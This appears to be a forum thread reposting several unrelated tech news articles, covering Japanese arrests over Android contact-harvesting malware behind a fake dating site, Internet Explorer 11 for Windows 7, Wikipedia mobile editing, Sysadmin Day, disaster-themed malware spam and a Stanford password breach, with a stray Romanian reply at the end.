Police in the Chiba Prefectural zone of Japan have arrested nine people suspected of making nearly $4m by distributing malware that harvested mobile user's contact information and using it for a fake dating website. The arrests came after a joint operation between the police and Symantec, and the security company reports that the possible ringleader of the group is Masaaki Kagawa, president of IT firm Koei Planning and a semi-professional poker player who has netted over $1.5m in winnings from tournament play over in the last six years. Since 2007 he's competed in a variety of games on the international poker circuit in London, Las Vegas, Monte Carlo, and Australia, with some success and the occasional massive loss. If convicted, however, Kagawa won't be playing high-stakes poker for some time to come. Kagawa and his associates are accused of using a wide variety of applications to spread the Android malware, Enesoluty, across third-party Android apps forums via 150 hosted domains. The malware harvested the email addresses of its victims, and it seems these were used to drive traffic to a phony dating website. Those who signed up for the dating site would be bombarded by messages from "people" wanting to talk with them, at the price of conversation tokens. A few people with multiple personas would encourage ever-longer conversations with no chance of meeting a flesh-and-blood date. "The mobile malware was just a step towards his real scheme which was to send out spam about his dating site and get people to sign up over there and not really get any service," Vikram Thakur, principal research manager at Symantec Security Response, told The Register. "By getting signups is where he made his money, but that's not to say that he didn't also sell the contact information on to spammers and the like," Thakur said. From the looks of some of the applications the malware distributors were pushing, they will have scooped the dumbest of users, so the email lists would have been perfect for psychics and pitchers of other such wondrous illogicalities. One application promised to turn the screen of the smartphone into a solar cell that would charge up the handset, while another app let users jiggle the breasts of a cartoon figure. In all cases, the infected application asked for contact details, despite there being no logical need for such data. "There's a sucker born every minute," the American scammer PT Barnam is reported to have said – and based on the gang's results he was right. These lamentable apps harvested 37 million email addresses from around 810,000 Android devices. Researchers at Symantec started picking up infections from Enesoluty in September last year and began analyzing the code. Thakur said it became clear that the malware didn't come from one of the many automatic malware generating kits available online, but was being written specifically by a group of programmers to harvest contact details. Further examination of the code showed details of where the purloined contact details were being routed through, and Symantec contacted the local police to see if the culprits could be caught. Thakur said the local police were "very switched-on" when it comes to this kind of crime. Maybe US investigators could get some tips from them. ® Sursa TheRegister.co.uk

Microsoft has released a developer preview build of Internet Explorer 11 for Windows 7, breaking a pattern of dragging its feet when it comes to supporting the latest version of IE on the older OS. After shipping IE10 with Windows 8, Redmond took over a year to release a preview version that ran on Windows 7, and another three months after that to ship the final version. This, despite the fact that most other software could run on either OS without a hitch. This time, Microsoft has offered up a Windows 7–compatible version of IE11 before the browser has technically even been released. The only way to get IE11 so far has been to install the Windows 8.1 Preview, which itself is still around a month away from shipping to OEMs. That won't be an acceptable solution for many developers, because Microsoft has warned that anyone who installed the Windows 8.1 Preview will need to re-install all of their applications after they upgrade to the final version. In a blog post on Thursday, group program managers Sandeep Singhal and Rob Mauceri of Microsoft's Internet Explorer team said the Windows 7 version of the browser gives users of the older OS "all of the performance, security, and under-the-hood changes that enable a compatible Web experience," which is virtually a cut-and-paste of what they said about the Windows 7 version of IE10 last November. The pair go on to extol the various virtues of Microsoft's latest browser, including improved JavaScript performance, hardware-accelerated graphics processing, support for new W3C standards, improved responsiveness on touch devices, and redesigned developer tools. Coinciding with the release of the IE11 preview build, Microsoft has upgraded its modern.IE web developer tools to work with the new browser by expanding its gallery of free, downloadable virtual machine images with images of IE11 running on Windows 7 and Windows 8.1 Preview. In addition, Microsoft is offering 25 per cent off Parallels Desktop 8 for Mac, to make it easier for OS X users to test their sites on IE. Your Reg hack couldn't help but notice one glaring omission, however. While Redmond seems intent on delivering a version of IE11 for Windows 7, Windows 8 is notably absent from any discussion of the new browser. In fact, attempting to install the IE11 preview on a stock Windows 8 machine without the Windows 8.1 Preview installed yields the following paradoxical error message: From the look of it, the only way to get IE11 running on Windows 8 will be to install the Windows 8.1 update when it eventually ships. It seems that when Steve Ballmer announced Microsoft's new rapid release cadence, he really meant it, and we're all expected to come along for the ride if we want the latest versions of tools like Internet Explorer. The IE11 preview for Windows 7 is available for download from Microsoft's Internet Explorer site beginning on Thursday. ® Sursa TheRegister.co.uk

The Wikimedia Foundation has flicked the switch on its mobile editing feature, allowing anyone with an account to edit Wikipedia articles on just about any mobile device capable of rendering HTML. The Foundation's aim is not to help you fill time during your commute. Instead, it says the new feature's been developed because it “... had to do more to let anyone with Internet access contribute to the sum of all human knowledge.” The 15 per cent of Wikipedia users who currently access the site on mobile devices are the “anyone” of special interest on this occasion, because the Foundation is assuming they may not also have a PC with which to edit the encyclopaedia. That's a not-unreasonable assumption based on our piece from yesterday about adoption of mobile devices in the developing world. The editor is simple to access: articles now include the pencil icon you can see in the screen shot below, captured in Chrome on a Samsung Galaxy S4. Clicking on that icon produces a very simple editor that reproduces a Wikipedia article in text with the option to use a few markup tags. Tapping inside the editing field invoked the handset's virtual keyboard, at which point the usual fat-fingered typing fun begins. The editor does not offer stellar experience and our brief experiments with it suggest typos will be hard to avoid, but the Foundation says it didn't want to go for lots of bells and whistles in its first release. The post announcing the new feature offers the following logic: “For our first release, our primary goal was to create a fast, intuitive editing experience for new users and experienced editors alike, while still sticking with markup editing for now. We started simple so we could observe our users’ needs and expectations.” It's hoped that observing users wrangle this editor will “let the Foundation “ … learn more about the kinds of edits people make on mobile “ so it can “build more advanced features, including possible Visual Editor integration, in future releases." Sursa TheRegister.co.uk

Sysadmin blog Today, this very Friday, is Sysadmin Day. As a system administrator, I'm naturally biased and think every day should be sysadmin day, but it's nice to know we have at least one day a year set aside for some recognition. What is really heartening to see is just how much awareness of the day has grown since its inception. As you might imagine, Sysadmin Day is not exactly an established cultural holiday. Sysadmin Day as it is celebrated today was started in 2000 by sysadmin Ted Kekatos, though various incarnations of it have existed since at least the 1960s. It was Kekatos that managed to bring the many informal celebrations together into one day and convince an ever increasing percentage of the world to set aside the last Friday of July. I remember first hearing about Sysadmin Day in July 2000; I'd missed the event proper, but was quite happy that it existed. I'd just graduated from high school and everyone in my life was shooing me in the direction of the local computer-science programme. Having just finished up a lifetime's course in schoolyard bullying for being "the nerd" I found the idea that maybe someone might appreciate computer types to be more than a little comforting. Of course, reality was somewhat different. Sysadmin Day was largely a tongue-in-cheek celebration observed only within the nerdosphere and unheard of by bosses, coworkers and so forth. It took a decade of spreading the word before this became an accepted thing – on a par with Secretaries Day in North America – at most of the workplaces I frequent. In much of the world, there is still a lot of work to do to gain any form of real recognition. I'm a real boy! Despite the sometimes uphill battle for notice I still feel that the day adds an air of legitimacy to our craft. Somehow, knowing that millions of people around the world celebrate systems administrators as important contributors to the workforce makes me feel less like we're the new kids on the block and more like we're an actual established profession. Professional associations have existed in IT for decades. CIPS - Canada's Association of IT Professionals – was founded in 1958 and offers an "Information Systems Professional" designation that is recognized in Canadian law. Legally speaking, obtaining that designation makes a sysadmin a professional no different in the eyes of Canadian law than a doctor, lawyer or certified accountant. Other countries have similar programmes, though recognition in law varies wildly by country. The Americans have ICCP while the Brits have the British Computer Society. While legal recognition of the importance of our craft certainly helps, public recognition and acceptance of sysadmins is still often questionable at best. Maybe it's the 16-year-old me still stuck deep down in my psyche, but "happy sysadmin day" once a year makes me feel just that little bit more normal. Party hard, chat to fellow sysadmins Growing mainstream acceptance of Sysadmin Day has led to an increased number of celebrations the world over. More companies than I can keep track of now either capitalise on the event for marketing, genuinely try to give something back to the sysadmin community, or both. I've put together a webinar with prizes for the sysadmins who can come up with the best question to stump our panel of "flash in the enterprise" experts. This is happening today (Friday) at 1.30pm Mountain Daylight Time (GMT -6) – sign up here – and we've even had a new company ServerAssist toss five 20-server licensing packs into the prize pool. Sysadmins, whether you are participating in any of the many contests, promotions or what-have-you that litter Sysadmin Day or not, I do hope you take the time out to enjoy your day. Ours is a largely thankless job and you deserve at least one day. For the rest, I hope you've a party planned for your sysadmins. Or that you'll say "happy sysadmin day". At the very least, smile at them and say "hi". Who knows, it might be a rare enough event that something that simple will make their (sysadmin) day. ® Sursa TheRegister.co.uk

This week's Spanish train disaster, in which at least 80 people were killed after a speeding train derailed, is being exploited by internet pondlife to spread malware. Security outfit Dynamoo spotted email spam that links to what's claimed to be to a CNN news story. Marks who click the URL end up on a hacked website riddled with malware to infect the passing web surfer. The ruse is crude. More sophisticated scams that rely on manipulating search engine results, possibly referencing CCTV footage (see below) of the inter-city train coming off the tracks near Santiago de Compostela in Galicia, are likely to follow. Back in the real world, Spain is mourning the deaths of 80 people in Wednesday evening's disaster, while 90 seriously injured passengers are being treated in hospitals. Any major story, ranging from natural disaster to celebrity deaths, is liable to become the theme of malware-based scams. In the case of human tragedy or natural disaster these are sometimes followed up with fake donation sites designed to enrich scumbags rather than help genuine victims. Earlier this week we predicted the birth of the first child to the Duke and Duchess of Cambridge was likely to become a theme of such scams. Sure enough, Prince George's arrival into the world was heralded by malware-flinging scams. Spam emails supposedly from ScribbleLive with the subject “The Royal Baby: Live Updates” lead to sites loaded with the Blackhole Exploit Kit, designed to exploit vulnerabilities and push the infamous Zeus banking Trojan, Threat Track Security reports. Malicious attachments in the form of Windows SCR files in scam emails about the royal birth have already been spotted doing the rounds. The royal baby, like the Spanish train crash, and other significant news stories such as a Barack Obama speech on the US economy and more have all become the themes of fake CNN news story malware scams this week, security firm AppRiver reports. ® Sursa TheRegister.co.uk

Stanford University is asking users to reset their passwords following the discovery of an attack that has left users and staff vulnerable to potential identity theft. “Stanford treats information security with the utmost seriousness and is continually upgrading its defenses against cyber attacks,” the university said. “Like many institutions, the university repels millions of attempted attacks on its information systems each day. In recent months, a range of large organisations have also reported attacks involving their information systems.” The company is currently unable to provide details on the scope and range of the attack, though the breach is believed to be confined to the university's campus and is related to a series of security breaches on US companies. A hallmark of the US education system, Stanford has emerged as a top source of information technology entrepreneurs in Silicon Valley. The university has produced technology leaders including Sergei Brin, Jerry Yang and Larry Page among other. The hack comes in the wake of numerous other high profile data thefts and password breaches at numerous firms. Earlier this week UK retailer Lakeland admitted hackers had accessed two databases, forcing the firm to reset all user passwords. In response the government has issued letters to the top FTSE 350 companies offering them the chance for a free cyber security audit against their peers to see how they are performing. Sursa V3.co.uk

N-are cum 1/4 pentru ca sunt 2 raspunsuri la fel. Deci 2/4 //Acum am vazut ca ai dat edit.